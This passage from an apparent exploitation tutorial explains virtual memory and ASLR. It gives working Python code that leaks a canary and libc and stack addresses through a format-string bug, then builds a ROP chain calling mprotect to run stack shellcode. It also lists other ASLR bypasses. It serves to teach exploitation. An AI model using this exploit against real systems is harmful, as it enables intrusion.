Most of the exploit strategies we’ve used so far rely on fixed addresses, such as the shellcode address on the stack, the addresses of critical data to leak (like canaries), and ROP gadget addresses. Without knowing these addresses, the exploit fails completely. ASLR is designed to kill this approach.
ASLR essentially randomizes the base address of the executable file when the program is loaded into memory and also randomizes the loaded libraries, stack, and heap. Thus, if an attacker gains control over the execution flow (such as controlling the instruction pointer), the location of the code to be executed, the addresses of the ROP gadgets, and everything else needed for the exploit are completely unknown. To understand how this protection exactly works, we first need to know how operating systems manage memory and the considerations behind it. Actually, what we see during debugging and the addresses we interact with are not actual physical memory addresses but virtual memory addresses. I’ll explain why operating systems work this way and what the benefits are.
Physical memory is very limited compared to what users demand from it: many programs running simultaneously, and servers that serve thousands or millions of clients. RAM sizes alone cannot keep up with all of this. Furthermore, RAM is expensive, not only financially but also because adding more of it affects other aspects, such as energy consumption. Virtual memory came to solve these problems.
Virtual memory can be defined as a memory management method in which the operating system simulates a memory larger than the physical memory. It allows programs whose total size is larger than physical memory to run, by loading only part of their data into physical memory rather than all of it. The hard disk is used to store data that is not currently in use. When that data is needed, the memory manager swaps it back into physical memory. To keep track of the data and its actual locations in physical memory, the memory manager builds a mapping table that records the virtual addresses of the data and the corresponding addresses in physical memory, as well as additional information that identifies which virtual addresses belong to which process. Have you ever noticed that the same addresses are repeated in different processes running at the same time?
Operating Systems Concepts book ch9
This mapping table (the page table) plays a vital role, helping the operating system translate virtual addresses into real physical addresses when a particular process accesses these virtual addresses. The operating system works along with the memory management unit (MMU) in the CPU to perform this task. That is why no collisions occur when different processes access the same virtual addresses.
Normally, when ASLR is disabled, the operating system maps processes to a fixed virtual memory range. But when it is enabled, the operating system selects random ranges each time the program is run. The page table will always help the memory manager translate these virtual addresses into physical addresses; it doesn’t care, they’re just numbers to it. I would like to point out here that the locations of data in physical memory are essentially random and different each time the program is run, whether you have ASLR enabled or not. ASLR is purely a matter of how virtual memory is laid out.
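On Linux you can watch this happen by comparing /proc/<pid>/maps between runs. As a minimal sketch, the helper below extracts the lowest mapped address of a module from maps-style text. The module_base function and the SAMPLE_MAPS text are my own; the sample lines are invented for illustration (only the libc base matches the debugging session used in this post).

```python
# Invented sample in the format of /proc/<pid>/maps.
SAMPLE_MAPS = """\
555555554000-555555555000 r--p 00000000 08:01 1234 /tmp/vuln
7ffff7dae000-7ffff7dd4000 r--p 00000000 08:01 5678 /usr/lib/x86_64-linux-gnu/libc.so.6
7ffff7dd4000-7ffff7f29000 r-xp 00026000 08:01 5678 /usr/lib/x86_64-linux-gnu/libc.so.6
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]
"""


def module_base(maps_text, name):
    """Return the lowest start address of mappings whose path contains name."""
    bases = []
    for line in maps_text.splitlines():
        fields = line.split()
        # fields: range, perms, offset, dev, inode, path (path may be missing)
        if len(fields) >= 6 and name in fields[5]:
            bases.append(int(fields[0].split("-")[0], 16))
    return min(bases) if bases else None


print(hex(module_base(SAMPLE_MAPS, "libc.so.6")))
print(hex(module_base(SAMPLE_MAPS, "[stack]")))
```

Feeding it the contents of /proc/self/maps from two separate runs should show different bases when ASLR is enabled and identical ones when it is disabled.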
Defeating ASLR
Yes, this protection makes things more difficult and makes exploitation more complex, especially when used in conjunction with the other protections mentioned above. However, there is still a lot we can do to bypass this protection. One strategy is to leak the required addresses using any memory disclosure bug or other techniques so we can defeat the randomization and circumvent the protection. To build our ROP chain, we only need a single address belonging to the module/library. From this address, we can calculate the base address of the module and also all the required ROP gadgets.

As shown in the image, there are addresses in the stack relative to the Libc and also an address relative to the stack. We need to leak these addresses to dynamically calculate the addresses of the important ROP gadgets we need, as well as the shellcode address. So, we need to update our leak_canary function to leak those required addresses, and rename it to an appropriate name such as leak_stuff.
def leak_stuff(p: Popen):
    p.stdin.write( b"1\n" + b"%49$p %51$p %67$p\n" + b"2\n" )
    p.stdin.flush()
    out = b""
    pos = -1
    n = 0
    while n < 1024:
        out = p.stdout.readline()
        pos = out.find( b"0x" )
        if bool( ~pos ):
            break
        n += 1
    else:
        return [ -1 ] * 3
    info = []
    n = 3
    while bool( n ):
        out = out[pos:]
        end = out.find( b" " )
        info += [ int(out[:end], 16) ]
        pos = ( end + 1 )
        n -= 1
    return info
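The parsing half of this function can also be written more compactly. The sketch below is an alternative under the assumption that the three leaked values arrive on one line separated by whitespace, as produced by the format string above; parse_leaks is a hypothetical helper name, and the sample values are only examples.

```python
def parse_leaks(line, count=3):
    """Extract `count` hex pointers from one line of %p output.

    Returns a list of -1 values if fewer than `count` pointers are present,
    for example when %p printed "(nil)" for a null pointer.
    """
    tokens = [t for t in line.split() if t.startswith(b"0x")]
    if len(tokens) < count:
        return [-1] * count
    return [int(t, 16) for t in tokens[:count]]


sample = b"0x1122334455667700 0x7ffff7dd7d68 0x7fffffffde98\n"
print([hex(v) for v in parse_leaks(sample)])
```

Splitting on whitespace avoids tracking positions by hand, and the trailing newline is discarded automatically.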
After leaking them, we need to modify the hijack_exec function, giving it the C library base address and the shellcode address as arguments. But first, we need to calculate the information we need from these leaked addresses.
(gdb) p/x 0x7ffff7dd7d68-0x00007ffff7dae000
$1 = 0x29d68
Subtracting the library’s base address from the leaked Libc address gives us this offset. Therefore, at runtime we subtract this offset from the leaked address to get the library’s base address.
(gdb) p/x 0x7fffffffde98-(0x7fffffffddb0+0x40)
$2 = 0xa8
Subtracting the shellcode address from the leaked stack address gives us this offset. Therefore, at runtime we subtract this offset from the leaked address to get the shellcode address.
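The arithmetic can be checked with a short Python sketch that uses the values from the gdb session above. The resolve function and the constant names are mine; the page-alignment check is just an extra sanity test I added, based on the fact that a library base is page-aligned.

```python
LIBC_LEAK_OFFSET = 0x29d68  # leaked libc address minus libc base
STACK_LEAK_OFFSET = 0xa8    # leaked stack address minus shellcode address


def resolve(libc_leak, stack_leak):
    """Turn the two leaked pointers into (libc_base, shellcode_address)."""
    libc_base = libc_leak - LIBC_LEAK_OFFSET
    if libc_base & 0xfff:
        # A page-unaligned base means the leak or the offset is wrong.
        raise ValueError("libc base is not page-aligned")
    return libc_base, stack_leak - STACK_LEAK_OFFSET


libc_base, shellcode = resolve(0x7ffff7dd7d68, 0x7fffffffde98)
print(hex(libc_base), hex(shellcode))
print(hex(libc_base + 0x2a205))  # runtime address of pop rdi; ret
```

With ASLR enabled, the two leaked values change on every run, but the offsets stay the same for the same binary and libc build.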
def hijack_exec(p: Popen, canary, libc_base, shellcode):
    stack_page = shellcode & 0xfffffffffffff000 # Align the address to the page boundary.
    payload = b""
    payload += b"A" * 0x106 # Fills the stack frame
    payload += struct.pack( "<Q", canary ) # Places the correct canary value
    payload += b"B" * 0x8 # Base pointer
    payload += struct.pack( "<Q", libc_base + 0x2a205 ) # pop rdi; ret
    payload += struct.pack( "<Q", stack_page ) # The aligned stack page address
    payload += struct.pack( "<Q", libc_base + 0x2bb39 ) # pop rsi; ret
    payload += struct.pack( "<Q", 0x1000 ) # Page size
    payload += struct.pack( "<Q", libc_base + 0x10d37d ) # pop rdx; ret
    payload += struct.pack( "<Q", 0x01 | 0x02 | 0x04 ) # Protections: PROT_READ=0x01, PROT_WRITE=0x02, PROT_EXEC=0x04
    payload += struct.pack( "<Q", libc_base + 0x10d200 ) # mprotect function address
    payload += struct.pack( "<Q", shellcode ) # Jump into shellcode
    payload += b"\x90" * 0x40 # NOPs for padding
    payload += buf # Shellcode
    p.stdin.write( b"1\n" )
    p.stdin.write( payload + b"\n" )
    p.stdin.flush()
Now, this function calculates all the required ROP gadget addresses dynamically, based on their relative virtual addresses (RVA) from the Libc base address. We now need to modify only two lines in the main function.
canary, libc_relative_addr, stack_relative_addr = leak_stuff( p )
And
hijack_exec( p, canary, libc_relative_addr-0x29d68, stack_relative_addr-0xa8 )
Now, everything is in order.

Notice that when we run the exploit while ASLR is enabled (in different modes), it works despite the randomization of the addresses, as shown in the picture.
Other Bypassing Techniques
There are many methods and techniques for bypassing and circumventing ASLR. It all depends on the targeted system’s nature, functionality, and the environment in which it operates. The solutions are endless, but they require some diligence and careful thinking. Here are some methods that can be used:
- Non-ASLR-aware modules: Not all libraries are ASLR-protected, especially on Windows. In this case, the operating system is forced to load them at a fixed virtual memory address. This fact can be abused to build a stable ROP chain that helps us execute our code or do whatever we want.
- Low ASLR entropy: Sometimes ASLR is not implemented properly and randomizes addresses in a non-optimal way, where only one or two bytes change while the rest remain constant. In this case, if we are targeting a local binary that can be run multiple times, or a network program that acts as a service and is automatically restarted when it crashes, the chances of exploiting it via brute force increase. If you think I am joking or that this bullshit is not feasible, I would like to tell you that even in 2025 we are still seeing such strategies in use, as with CVE-2025-0282.
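To get a feeling for why low entropy matters, here is a rough back-of-the-envelope sketch. It assumes the unknown bits are uniformly random and re-randomized on every restart, and that each attempt guesses one fixed value; both function names are mine.

```python
def expected_attempts(entropy_bits):
    """Average number of tries until a fixed guess matches the random bits."""
    return 2 ** entropy_bits


def success_probability(entropy_bits, attempts):
    """Chance that at least one of `attempts` independent tries succeeds."""
    p = 1.0 / (2 ** entropy_bits)
    return 1.0 - (1.0 - p) ** attempts


for bits in (8, 16, 28):
    print(bits, expected_attempts(bits), round(success_probability(bits, 1000), 4))
```

With only 8 unknown bits, 1000 attempts succeed almost certainly, while with 28 unknown bits the same number of attempts is practically hopeless. That is the gap a weak ASLR implementation opens up.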
Conclusion
The methods of circumventing various protections always depend primarily on the nature of the target, the environment in which it operates, its specific functionality, and many other factors of this kind. There is no magic method that will always allow you to bypass everything. Yes, there are general ideas for each protection that help in bypassing it, but the rest depends on you. No one will help you except your experience and your technical and practical skills. Perhaps a small detail in the program you are targeting, if used in a creative way, might allow you to bypass these protections. To improve your level and become able to develop your own creative exploitation strategies, you need to train and practice a lot. No one can develop complex and advanced exploits just by learning about such vulnerabilities and attacks without practice. It comes gradually as you encounter many scenarios and read about different exploits. So, I advise you to read a lot and try to build exploits for previously discovered vulnerabilities yourself. This will help you a lot and improve your level insanely.